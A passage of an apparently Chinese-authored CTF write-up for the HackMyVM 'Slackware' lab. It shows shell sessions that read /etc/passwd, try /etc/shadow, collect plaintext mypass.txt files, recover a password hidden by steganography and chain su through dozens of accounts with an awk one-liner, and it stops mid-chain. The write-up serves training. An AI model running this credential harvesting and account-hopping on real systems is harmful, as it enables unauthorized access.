   112 Mar 10 22:15 sml\/\ndrwxr-x---  2 tasiyanci  ruycr4ft    112 Mar 10 22:15 tasiyanci\/\ndrwxr-x---  2 
terminal   zacarx007   112 Mar 10 22:15 terminal\/\ndrwxr-x---  2 waidroc    boyras200   112 Mar 10 22:15 waidroc\/\ndrwxr-x---  2 whitecr0wz wwfymn      112 Mar 10 22:15 whitecr0wz\/\ndrwxr-x---  2 wwfymn     pylon       112 Mar 10 22:15 wwfymn\/\ndrwxr-x---  2 x4v1l0k    proxy       112 Mar 10 22:15 x4v1l0k\/\ndrwxr-x---  2 zacarx007  mindsflee   112 Mar 10 22:15 zacarx007\/\ndrwxr-x---  2 zayotic    avijneyam   112 Mar 10 22:15 zayotic\/\ndrwxr-x---  2 zenmpi     terminal    112 Mar 10 22:15 zenmpi\/\ndrwxr-x---  2 ziyos      waidroc     112 Mar 10 22:15 ziyos\/\n(remote) patrick@slackware.slackware.local:\/home$ cat \/etc\/passwd\nroot:x:0:0::\/root:\/bin\/bash\nbin:x:1:1:bin:\/bin:\/bin\/false\ndaemon:x:2:2:daemon:\/sbin:\/bin\/false\nadm:x:3:4:adm:\/var\/log:\/bin\/false\nlp:x:4:7:lp:\/var\/spool\/lpd:\/bin\/false\nsync:x:5:0:sync:\/sbin:\/bin\/sync\nshutdown:x:6:0:shutdown:\/sbin:\/sbin\/shutdown\nhalt:x:7:0:halt:\/sbin:\/sbin\/halt\nmail:x:8:12:mail:\/:\/bin\/false\nnews:x:9:13:news:\/usr\/lib\/news:\/bin\/false\nuucp:x:10:14:uucp:\/var\/spool\/uucppublic:\/bin\/false\noperator:x:11:0:operator:\/root:\/bin\/bash\ngames:x:12:100:games:\/usr\/games:\/bin\/false\nftp:x:14:50::\/home\/ftp:\/bin\/false\nsmmsp:x:25:25:smmsp:\/var\/spool\/clientmqueue:\/bin\/false\nmysql:x:27:27:MySQL:\/var\/lib\/mysql:\/bin\/false\nrpc:x:32:32:RPC portmap user:\/:\/bin\/false\nsshd:x:33:33:sshd:\/:\/bin\/false\ngdm:x:42:42:GDM:\/var\/lib\/gdm:\/sbin\/nologin\nntp:x:44:44:User for NTP:\/:\/bin\/false\nicecc:x:49:49:User for Icecream distributed compiler:\/var\/cache\/icecream:\/bin\/false\noprofile:x:51:51:oprofile:\/:\/bin\/false\nusbmux:x:52:83:User for usbmux daemon:\/var\/empty:\/bin\/false\nnamed:x:53:53:User for BIND:\/var\/named:\/bin\/false\nsddm:x:64:64:User for SDDM:\/var\/lib\/sddm:\/bin\/false\npulse:x:65:65:User for PulseAudio:\/var\/run\/pulse:\/bin\/false\ndhcpcd:x:68:68:User for dhcpcd:\/var\/lib\/dhcpcd:\/bin\/false\napache:x:80:80:User for 
Apache:\/srv\/httpd:\/bin\/false\nmessagebus:x:81:81:User for D-BUS:\/var\/run\/dbus:\/bin\/false\nhaldaemon:x:82:82:User for HAL:\/var\/run\/hald:\/bin\/false\npolkitd:x:87:87:PolicyKit daemon owner:\/var\/lib\/polkit:\/bin\/false\npop:x:90:90:POP:\/:\/bin\/false\npostfix:x:91:91:User for Postfix MTA:\/dev\/null:\/bin\/false\ndovecot:x:94:94:User for Dovecot processes:\/dev\/null:\/bin\/false\ndovenull:x:95:95:User for Dovecot login processing:\/dev\/null:\/bin\/false\nnobody:x:99:99:nobody:\/:\/bin\/false\nldap:x:330:330:OpenLDAP server:\/var\/lib\/openldap:\/bin\/false\npatrick:x:1000:1000::\/home\/patrick:\/bin\/bash\nkretinga:x:1001:1001::\/home\/kretinga:\/bin\/bash\nclaor:x:1002:1002::\/home\/claor:\/bin\/bash\nalienum:x:1003:1003::\/home\/alienum:\/bin\/bash\nmrmidnight:x:1004:1004::\/home\/mrmidnight:\/bin\/bash\nannlynn:x:1005:1005::\/home\/annlynn:\/bin\/bash\npowerful:x:1006:1006::\/home\/powerful:\/bin\/bash\nproxy:x:1007:1007::\/home\/proxy:\/bin\/bash\nx4v1l0k:x:1008:1008::\/home\/x4v1l0k:\/bin\/bash\nicex64:x:1009:1009::\/home\/icex64:\/bin\/bash\nmindsflee:x:1010:1010::\/home\/mindsflee:\/bin\/bash\nzacarx007:x:1011:1011::\/home\/zacarx007:\/bin\/bash\nterminal:x:1012:1012::\/home\/terminal:\/bin\/bash\nzenmpi:x:1013:1013::\/home\/zenmpi:\/bin\/bash\nsml:x:1014:1014::\/home\/sml:\/bin\/bash\nemvee:x:1015:1015::\/home\/emvee:\/bin\/bash\nnls:x:1016:1016::\/home\/nls:\/bin\/bash\nnoname:x:1017:1017::\/home\/noname:\/bin\/bash\nnolose:x:1018:1018::\/home\/nolose:\/bin\/bash\nsancelisso:x:1019:1019::\/home\/sancelisso:\/bin\/bash\nruycr4ft:x:1020:1020::\/home\/ruycr4ft:\/bin\/bash\ntasiyanci:x:1021:1021::\/home\/tasiyanci:\/bin\/bash\nlanz:x:1022:1022::\/home\/lanz:\/bin\/bash\npylon:x:1023:1023::\/home\/pylon:\/bin\/bash\nwwfymn:x:1024:1024::\/home\/wwfymn:\/bin\/bash\nwhitecr0wz:x:1025:1025::\/home\/whitecr0wz:\/bin\/bash\nbit:x:1026:1026::\/home\/bit:\/bin\/bash\ninfayerts:x:1027:1027::\/home\/infayerts:\/bin\/bash\nrijaba1:x:1028:1028::\/home\/rijab
a1:\/bin\/bash\ncromiphi:x:1029:1029::\/home\/cromiphi:\/bin\/bash\ngatogamer:x:1030:1030::\/home\/gatogamer:\/bin\/bash\nch4rm:x:1031:1031::\/home\/ch4rm:\/bin\/bash\naceomn:x:1032:1032::\/home\/aceomn:\/bin\/bash\nkerszi:x:1033:1033::\/home\/kerszi:\/bin\/bash\nd3b0o:x:1034:1034::\/home\/d3b0o:\/bin\/bash\navijneyam:x:1035:1035::\/home\/avijneyam:\/bin\/bash\nzayotic:x:1036:1036::\/home\/zayotic:\/bin\/bash\nkaian:x:1037:1037::\/home\/kaian:\/bin\/bash\nc4rta:x:1038:1038::\/home\/c4rta:\/bin\/bash\nboyras200:x:1039:1039::\/home\/boyras200:\/bin\/bash\nwaidroc:x:1040:1040::\/home\/waidroc:\/bin\/bash\nziyos:x:1041:1041::\/home\/ziyos:\/bin\/bash\nb4el7d:x:1042:1042::\/home\/b4el7d:\/bin\/bash\nrpj7:x:1043:1043::\/home\/rpj7:\/bin\/bash\nh1dr0:x:1044:1044::\/home\/h1dr0:\/bin\/bash\ncatch_me75:x:1045:1045::\/home\/catch_me75:\/bin\/bash\njosemlwdf:x:1046:1046::\/home\/josemlwdf:\/bin\/bash\nskinny:x:1047:1047::\/home\/skinny:\/bin\/bash\n0xeex75:x:1048:1048::\/home\/0xeex75:\/bin\/bash\n0xh3rshel:x:1049:1049::\/home\/0xh3rshel:\/bin\/bash\n0xjin:x:1050:1050::\/home\/0xjin:\/bin\/bash\n(remote) patrick@slackware.slackware.local:\/home$ cat \/etc\/shadow\ncat: \/etc\/shadow: Permission denied\n(remote) patrick@slackware.slackware.local:\/home$ cd patrick\/\n(remote) patrick@slackware.slackware.local:\/home\/patrick$ ls -la\ntotal 9\ndrwx--x--x  3 patrick users    136 Apr 25 09:43 .\/\ndrwxr-xr-x 54 root    root    1400 Mar 10 22:16 ..\/\n-rw-------  1 patrick patrick    5 Apr 25 09:43 .bash_history\ndrwx------  2 patrick patrick   48 Apr 25 09:45 .cache\/\n-rw-r--r--  1 patrick users   3729 Feb  2  2022 .screenrc\n(remote) patrick@slackware.slackware.local:\/home\/patrick$ cd .bash_history \n-bash: cd: .bash_history: Not a directory\n(remote) patrick@slackware.slackware.local:\/home\/patrick$ cat .bash_history \nexit\n(remote) patrick@slackware.slackware.local:\/home\/patrick$ cd .cache\/\n(remote) patrick@slackware.slackware.local:\/home\/patrick\/.cache$ ls 
-la\ntotal 0\ndrwx------ 2 patrick patrick  48 Apr 25 09:45 .\/\ndrwx--x--x 3 patrick users   136 Apr 25 09:43 ..\/<\/code><\/pre>\n<h3>Switching users<\/h3>\n<pre><code class=\"language-bash\">(remote) patrick@slackware.slackware.local:\/home$ cat \/home\/claor\/mypass.txt\nJRksNe5rWgis\n(remote) patrick@slackware.slackware.local:\/home$ cat \/home\/kretinga\/mypass.txt\nlpV8UG0GxKuw\n(remote) patrick@slackware.slackware.local:\/home$ find .\/ -name *pass* -type f 2&gt;\/dev\/null\n.\/claor\/mypass.txt\n.\/kretinga\/mypass.txt\n(remote) patrick@slackware.slackware.local:\/home$ su claor\nPassword: \n(remote) claor@slackware.slackware.local:\/home$ find .\/ -name *pass* -type f 2&gt;\/dev\/null\n.\/claor\/mypass.txt\n.\/mrmidnight\/mypass.txt\n.\/alienum\/mypass.txt\n\n(remote) claor@slackware.slackware.local:\/home$ find .\/ -name &#039;*pass*&#039; -type f 2&gt;\/dev\/null | xargs cat\nJRksNe5rWgis\nB4ReHPEhmlPt\nex0XVRAAjCWX\n(remote) claor@slackware.slackware.local:\/home$ su mrmidnight\nPassword: \n(remote) mrmidnight@slackware.slackware.local:\/home$ find .\/ -name *pass* -type f 2&gt;\/dev\/null\n.\/powerful\/mypass.txt\n.\/mrmidnight\/mypass.txt\n.\/annlynn\/mypass.txt\n(remote) mrmidnight@slackware.slackware.local:\/home$ find .\/ -name &#039;*pass*&#039; -type f 2&gt;\/dev\/null | xargs cat\npof2XIpVzYl3\nB4ReHPEhmlPt\nS64IamSERUI3\n(remote) mrmidnight@slackware.slackware.local:\/home$ sudo -l\n\nWe trust you have received the usual lecture from the local System\nAdministrator. 
It usually boils down to these three things:\n\n    #1) Respect the privacy of others.\n    #2) Think before you type.\n    #3) With great power comes great responsibility.\n\nFor security reasons, the password you type will not be visible.\n\nPassword: \nSorry, user mrmidnight may not run sudo on slackware.<\/code><\/pre>\n<p>Too many to go through by hand, so I tried uploading <code>linpeas.sh<\/code><\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404252256378.png\" alt=\"image-20240425180707479\" style=\"zoom:50%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404252256379.png\" alt=\"image-20240425180718659\" style=\"zoom:50%;\" \/><br \/>\n<img
src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404252256380.png\" alt=\"image-20240425180732585\" style=\"zoom:50%;\" \/><\/p>\n<pre><code class=\"language-apl\">\/etc\/ImageMagick-7\/mime.xml<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404252256381.png\" alt=\"image-20240425180835639\" style=\"zoom:67%;\" \/><br \/>\n<img
src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404252256382.png\" alt=\"image-20240425180927987\" style=\"zoom:50%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404252256383.png\" alt=\"image-20240425181149249\" style=\"zoom: 50%;\" \/><\/p>\n<p>The experts in the group chat worked through the whole nested chain!<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404252256384.png\" alt=\"image-20240425181319562\" style=\"zoom:50%;\"
\/><\/p>\n<pre><code class=\"language-bash\">(remote) rpj7@slackware.slackware.local:\/home\/rpj7$ ls -la\ntotal 13\ndrwxr-x---  2 rpj7 b4el7d  136 Mar 11 12:47 .\ndrwxr-xr-x 54 root root   1400 Mar 10 22:16 ..\n-rw-r--r--  1 rpj7 rpj7   3729 Feb  2  2022 .screenrc\n-rw-r-----  1 rpj7 b4el7d   13 Mar 10 22:15 mypass.txt\n-rw-r--r--  1 rpj7 b4el7d  314 Mar 11 13:29 user.txt\n(remote) rpj7@slackware.slackware.local:\/home\/rpj7$ cat user.txt \nHMV{Th1s1s1Us3rFlag}                                                           \n(remote) rpj7@slackware.slackware.local:\/home\/rpj7$ <\/code><\/pre>\n<p>None of it turned up anything; later the group owner found that it had to do with <code>user.txt<\/code>:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/slakeware]\n\u2514\u2500$ cat user.txt \nHMV{Th1s1s1Us3rFlag}                                                          \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/slakeware]\n\u2514\u2500$ file user.txt \nuser.txt: ASCII text\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/slakeware]\n\u2514\u2500$ stegsnow -C user.txt \nTo_Jest_Bardzo_Trudne_Haslo<\/code><\/pre>\n<p>It was steganography.....<\/p>\n<pre><code class=\"language-bash\">(remote) root@slackware.slackware.local:\/root# ls -la\ntotal 5\ndrwx--x---  6 root root 232 Mar 11 13:38 .\ndrwxr-xr-x 23 root root 536 Mar 10 16:29 ..\nlrwxrwxrwx  1 root root   9 Mar 10 18:42 .bash_history -&gt; \/dev\/null\ndrwx------  3 root root  72 Mar 11 15:14 .cache\ndrwx------  3 root root  72 Feb 16 22:12 .config\ndrwx------  2 root root 136 Feb 16 22:13 .gnupg\nlrwxrwxrwx  1 root root   9 Mar 11 12:44 .lesshst -&gt; \/dev\/null\ndrwx------  3 root root  72 Feb 16 22:12 .local\n-r--------  1 root root  72 Mar 11 13:38 roo00oot.txt\n(remote) root@slackware.slackware.local:\/root# cat roo00oot.txt \nThere is no root flag here, but it is somewhere in the \/home 
directory.\n(remote) root@slackware.slackware.local:\/root# cd \/home\n(remote) root@slackware.slackware.local:\/home# find .\/ -name roo00oot.txt -type f 2&gt;\/dev\/null\n(remote) root@slackware.slackware.local:\/home# ls\n0xeex75    boyras200   gatogamer  mindsflee   rijaba1     whitecr0wz\n0xh3rshel  c4rta       h1dr0      mrmidnight  rpj7        wwfymn\n0xjin      catch_me75  icex64     nls         ruycr4ft    x4v1l0k\naceomn     ch4rm       infayerts  nolose      sancelisso  zacarx007\nalienum    claor       josemlwdf  noname      skinny      zayotic\nannlynn    cromiphi    kaian      patrick     sml         zenmpi\navijneyam  d3b0o       kerszi     powerful    tasiyanci   ziyos\nb4el7d     emvee       kretinga   proxy       terminal\nbit        ftp         lanz       pylon       waidroc\n(remote) root@slackware.slackware.local:\/home# cd 0xeex75\/\n(remote) root@slackware.slackware.local:\/home\/0xeex75# ls -la\ntotal 5\ndrwxr-x---  2 0xeex75 0xeex75   80 Mar 10 22:15 .\ndrwxr-xr-x 54 root    root    1400 Mar 10 22:16 ..\n-rw-r--r--  1 0xeex75 0xeex75 3729 Feb  2  2022 .screenrc\n(remote) root@slackware.slackware.local:\/home\/0xeex75# find .\/ -name *oo*.txt -type f 2&gt;\/dev\/null\n(remote) root@slackware.slackware.local:\/home\/0xeex75# find .\/ -name *oo -type f 2&gt;\/dev\/null\n(remote) root@slackware.slackware.local:\/home\/0xeex75# cd ..\n(remote) root@slackware.slackware.local:\/home# find .\/ -name *oo*.txt -type f 2&gt;\/dev\/null\n(remote) root@slackware.slackware.local:\/home# find .\/ -name *oo -type f 2&gt;\/dev\/null\n(remote) root@slackware.slackware.local:\/home# cd kerszi\/\n(remote) root@slackware.slackware.local:\/home\/kerszi# ls -la\ntotal 9\ndrwxr-x---  2 kerszi aceomn  112 Mar 10 22:15 .\ndrwxr-xr-x 54 root   root   1400 Mar 10 22:16 ..\n-rw-r--r--  1 kerszi kerszi 3729 Feb  2  2022 .screenrc\n-rw-r-----  1 kerszi aceomn   13 Mar 10 22:15 mypass.txt\n(remote) root@slackware.slackware.local:\/home\/kerszi# cd ..\n(remote) 
root@slackware.slackware.local:\/home# find .\/ -name *.txt -type f 2&gt;\/dev\/null\n.\/bit\/mypass.txt\n.\/nls\/mypass.txt\n.\/sml\/mypass.txt\n.\/lanz\/mypass.txt\n.\/rpj7\/mypass.txt\n.\/rpj7\/user.txt\n.\/sancelisso\/mypass.txt\n.\/c4rta\/mypass.txt\n.\/d3b0o\/mypass.txt\n.\/gatogamer\/mypass.txt\n.\/ch4rm\/mypass.txt\n.\/h1dr0\/mypass.txt\n.\/claor\/mypass.txt\n.\/emvee\/mypass.txt\n.\/kaian\/mypass.txt\n.\/rijaba1\/mypass.txt\n.\/proxy\/mypass.txt\n.\/pylon\/mypass.txt\n.\/ziyos\/mypass.txt\n.\/zayotic\/mypass.txt\n.\/mindsflee\/mypass.txt\n.\/x4v1l0k\/mypass.txt\n.\/terminal\/mypass.txt\n.\/b4el7d\/mypass.txt\n.\/zacarx007\/mypass.txt\n.\/boyras200\/mypass.txt\n.\/tasiyanci\/mypass.txt\n.\/aceomn\/mypass.txt\n.\/powerful\/mypass.txt\n.\/mrmidnight\/mypass.txt\n.\/whitecr0wz\/mypass.txt\n.\/icex64\/mypass.txt\n.\/kerszi\/mypass.txt\n.\/ruycr4ft\/mypass.txt\n.\/kretinga\/mypass.txt\n.\/nolose\/mypass.txt\n.\/noname\/mypass.txt\n.\/skinny\/mypass.txt\n.\/catch_me75\/mypass.txt\n.\/avijneyam\/mypass.txt\n.\/alienum\/mypass.txt\n.\/wwfymn\/mypass.txt\n.\/annlynn\/mypass.txt\n.\/zenmpi\/mypass.txt\n.\/waidroc\/mypass.txt\n.\/infayerts\/mypass.txt\n.\/josemlwdf\/mypass.txt\n.\/cromiphi\/mypass.txt\n(remote) root@slackware.slackware.local:\/home# find .\/ -name *.txt -type f 2&gt;\/dev\/null | xargs cat\nfDZRz4SJOs8z\nVfS9EIU5C9xw\nAQewY20VryO7\nIBrVGveXM3jI\nwP26CtkDby6J\nHMV{Th1s1s1Us3rFlag}                                                          
\n\noAGSK1zXcbT8\nIAuaOSSTZHoh\noHjylQ7402Dd\nyjwGMry82S2Y\nHz35MslshyXj\ntnvAny2zwYTV\nJRksNe5rWgis\nsj5mu74Nmowb\nR23AJFVTQYaB\neaqz8vJ2pRmU\nGX2xnNNU2Hcc\n6Mqoo8Pud4Fx\n8eS8I1JGxeeZ\nbgg9TT9otdD6\nVZFoxk0lqnnc\nTB7pVPwPUeIW\nQv0dtvZdfpvN\nllMttpVCiYPw\n8LCa5IDAELR4\noW19TzLywNIq\nJO8dvF60MdXR\nsXdnu8wF1Yb8\npof2XIpVzYl3\nB4ReHPEhmlPt\n51BwJ9iYO4E7\ntX5o7AUg2PTd\nrjDwcHDFYBML\nG5UJEpW78pOV\nlpV8UG0GxKuw\nKcHXtRsiUPpw\n0Vsok2PoVo7t\niJ7EnTBCtUS8\nVkyo6rKvXsIw\nvRdS8PLTnTlW\nex0XVRAAjCWX\nVBebiyG62uIg\nS64IamSERUI3\nWiEbQP6K4Sg9\n0aApTUf5E2Eq\nNYURcD5V8k4X\njLzXNEEFdtLX\nCQBpV2NQ3U6A\n(remote) root@slackware.slackware.local:\/home# find .|xargs grep -ri &quot;hmv&quot; \n.\/rpj7\/user.txt:HMV{Th1s1s1Us3rFlag}                                                           \n.\/0xh3rshel\/.screenrc:# Here is a flag for root: HMV{SlackwareStillAlive}\n.\/rpj7\/user.txt:HMV{Th1s1s1Us3rFlag}                                                           \n.\/rpj7\/user.txt:HMV{Th1s1s1Us3rFlag}                                                           \ngrep: .\/mrmidnight\/.gnupg\/S.gpg-agent.ssh: No such device or address\ngrep: .\/mrmidnight\/.gnupg\/S.gpg-agent.extra: No such device or address\ngrep: .\/mrmidnight\/.gnupg\/S.gpg-agent: No such device or address\ngrep: .\/mrmidnight\/.gnupg\/S.gpg-agent.browser: No such device or address.\/0xh3rshel\/.screenrc:# Here is a flag for root: HMV{SlackwareStillAlive}\n.\/0xh3rshel\/.screenrc:# Here is a flag for root: HMV{SlackwareStillAlive}<\/code><\/pre>\n<p>.....I was sweating bullets....<\/p>\n<h2>Extra takeaways<\/h2>\n<p>Data-processing method from the <a href=\"https:\/\/hackmyvm.eu\/profile\/?user=ll104567\">group owner<\/a>:<\/p>\n<p><img
src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404261337894.png\" alt=\"image-20240426130104342\" style=\"zoom:50%;\" \/><\/p>\n<p>Putting it into practice:<\/p>\n<pre><code class=\"language-bash\">patrick@slackware:~$ id\nuid=1000(patrick) gid=1000(patrick) groups=1000(patrick),1001(kretinga)\npatrick@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;)\npatrick@slackware:~$ echo $user\nkretinga\npatrick@slackware:~$ pass=$(cat ..\/$user\/mypass.txt)\npatrick@slackware:~$ echo $pass\nlpV8UG0GxKuw\npatrick@slackware:~$ grep -Pnir &#039;hmv&#039; \/home 2&gt;\/dev\/null\npatrick@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nlpV8UG0GxKuw\nPassword: \nkretinga@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nJRksNe5rWgis\nPassword: \nclaor@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nex0XVRAAjCWX\nPassword: \nalienum@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nB4ReHPEhmlPt\nPassword: \nmrmidnight@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nS64IamSERUI3\nPassword: \nannlynn@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo 
$pass;su - $user\npof2XIpVzYl3\nPassword: \npowerful@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nGX2xnNNU2Hcc\nPassword: \nproxy@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nTB7pVPwPUeIW\nPassword: \nx4v1l0k@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\ntX5o7AUg2PTd\nPassword: \nicex64@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nVZFoxk0lqnnc\nPassword: \nmindsflee@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\n8LCa5IDAELR4\nPassword: \nzacarx007@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nQv0dtvZdfpvN\nPassword: \nterminal@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nWiEbQP6K4Sg9\nPassword: \nzenmpi@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nAQewY20VryO7\nPassword: \nsml@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nsj5mu74Nmowb\nPassword: \nemvee@slackware:~$  user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nVfS9EIU5C9xw\nPassword: \nnls@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\n0Vsok2PoVo7t\nPassword: \nnoname@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - 
$user\nKcHXtRsiUPpw\nPassword: \nnolose@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\noAGSK1zXcbT8\nPassword: \nsancelisso@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nG5UJEpW78pOV\nPassword: \nruycr4ft@slackware:~$  user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nJO8dvF60MdXR\nPassword: \ntasiyanci@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nIBrVGveXM3jI\nPassword: \nlanz@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\n6Mqoo8Pud4Fx\nPassword: \npylon@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nVBebiyG62uIg\nPassword: \nwwfymn@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\n51BwJ9iYO4E7\nPassword: \nwhitecr0wz@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nfDZRz4SJOs8z\nPassword: \nbit@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nNYURcD5V8k4X\nPassword: \ninfayerts@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\neaqz8vJ2pRmU\nPassword: \nrijaba1@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nCQBpV2NQ3U6A\nPassword: \ncromiphi@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - 
$user\nyjwGMry82S2Y\nPassword: \ngatogamer@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nHz35MslshyXj\nPassword: \nch4rm@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nsXdnu8wF1Yb8\nPassword: \naceomn@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nrjDwcHDFYBML\nPassword: \nkerszi@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\noHjylQ7402Dd\nPassword: \nd3b0o@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nvRdS8PLTnTlW\nPassword: \navijneyam@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nbgg9TT9otdD6\nPassword: \nzayotic@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nR23AJFVTQYaB\nPassword: \nkaian@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nIAuaOSSTZHoh\nPassword: \nc4rta@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\noW19TzLywNIq\nPassword: \nboyras200@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\n0aApTUf5E2Eq\nPassword: \nwaidroc@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\n8eS8I1JGxeeZ\nPassword: \nziyos@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - 
